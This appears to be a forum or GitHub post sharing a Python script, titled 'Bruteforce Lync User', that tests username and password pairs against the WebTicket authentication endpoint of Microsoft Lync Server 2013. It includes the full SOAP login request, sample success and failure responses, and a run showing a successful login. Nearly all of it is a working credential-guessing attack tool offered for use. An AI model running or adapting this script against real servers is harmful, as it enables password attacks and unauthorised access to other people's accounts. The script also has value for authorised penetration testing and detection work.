Open nixawk opened 6 years ago
#!/usr/bin/python # -*- coding: utf-8 -*- # Purpose: Bruteforce Lync User. # Product: Microoft lync server 2013 # Author : Nixawk import requests import base64 import logging logging.basicConfig(level=logging.INFO) log = logging.getLogger(__name__) def lync_login(indexURI, username, password): boolret = False sapi = "%s/WebTicket/WebTicketService.svc/Auth" % indexURI data = '' data += '<s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/">' data += '<s:Header>' data += '<Security s:mustUnderstand="1" xmlns:u="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd" xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">' data += '<UsernameToken>' data += '<Username>%s</Username>' % base64.b64encode(username) data += '<Password Type="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-username-token-profile-1.0#PasswordText">%s</Password>' % base64.b64encode(password) data += '</UsernameToken>' data += '</Security>' data += '</s:Header>' data += '<s:Body>' data += '<RequestSecurityToken xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" Context="50f2ef42-a03a-fa41-fe45-b032979f3642" xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512">' data += '<TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType>' data += '<RequestType>http://schemas.xmlsoap.org/ws/2005/02/trust/Issue</RequestType><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy">' data += '<EndpointReference xmlns="http://www.w3.org/2005/08/addressing">' data += '<Address>%s/WebTicket/WebTicketService.svc/Auth</Address>' % indexURI data += '</EndpointReference>' data += '</AppliesTo>' data += '<Lifetime>' data += '<Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:00:28Z</Created>' data += '<Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T08:31:28Z</Expires>' data += '</Lifetime>' data += '<KeyType>http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey</KeyType>' data += '</RequestSecurityToken>' data += '</s:Body>' data += '</s:Envelope>' headers = { "User-Agent": "Mozilla/5.0 (X11; Linux i686; rv:45.0) Gecko/20100101 Firefox/45.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Content-Type": "text/xml", "SOAPAction": "http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue", "Referer": "%s/Dialin/Conference.aspx" % indexURI, } try: sess = requests.Session() response = sess.post(sapi, headers=headers, data=data) if response is None: log.info("%s/%s - login failed." % (username, password)) return boolret if response.status_code == 200 and "<RequestedSecurityToken>" in response.text: log.info("%s/%s - login successfully !" % (username, password)) boolret = True log.info("%s/%s - login status: %s", username, password, response.status_code) except Exception as err: log.exception(str(err)) return boolret # Error Response: # <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd">a:InvalidSecurityToken</faultcode><faultstring xml:lang="zh-CN">No valid security token.</faultstring><detail><OCSDiagnosticsFault xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><Ms-Diagnostics-Fault><ErrorId>28020</ErrorId><Reason>No valid security token.</Reason></Ms-Diagnostics-Fault><NameValuePairs xmlns:a="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/></OCSDiagnosticsFault></detail></s:Fault></s:Body></s:Envelope> # Succe Response: # <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><RequestSecurityTokenResponseCollection xmlns="http://docs.oasis-open.org/ws-sx/ws-trust/200512" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"><RequestSecurityTokenResponse Context="50f2ef42-a03a-fa41-fe45-b032979f3642"><TokenType>urn:component:Microsoft.Rtc.WebAuthentication.2010:user-cwt-1</TokenType><RequestedSecurityToken><UserToken xmlns="urn:component:Microsoft.Rtc.WebAuthentication.2010">cwt=AAEBHAEFAAAAAAAFFQAAADZZRLr9wt7biZjFdLjiAACBED....eA5TnN-9Gz7aSPI</UserToken></RequestedSecurityToken><AppliesTo xmlns="http://schemas.xmlsoap.org/ws/2004/09/policy"><EndpointReference xmlns="http://www.w3.org/2005/08/addressing"><Address>https://lyncpool.example.com/</Address></EndpointReference></AppliesTo><Lifetime><Created xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:04:22.5149452Z</Created><Expires xmlns="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd">2017-07-31T09:22:28.5149452Z</Expires></Lifetime><KeySize>0</KeySize></RequestSecurityTokenResponse></RequestSecurityTokenResponseCollection></s:Body></s:Envelope> if __name__ == '__main__': import sys if len(sys.argv) != 4: print("[*] python %s <lync URI> <username@mail.com> <password>" % sys.argv[0]) sys.exit(0) # indexURI = "https://lyncpool.example.com" indexURI = sys.argv[1] username = sys.argv[2] password = sys.argv[3] lync_login(indexURI, username, password) ## References # https://msdn.microsoft.com/en-us/skype/ucwa/ucwaresources # https://ucwa.skype.com/documentation/keytasks-createapplication # https://msdn.microsoft.com/en-us/skype/ucwa/authenticationinucwa
$ python2.7 bruteforce_lync_server2013.py https://lyncpool.example.com "username@example.com/" "password" INFO:__main__:username@example.com/password - login successfully ! INFO:__main__:username@example.com/password - login status: 200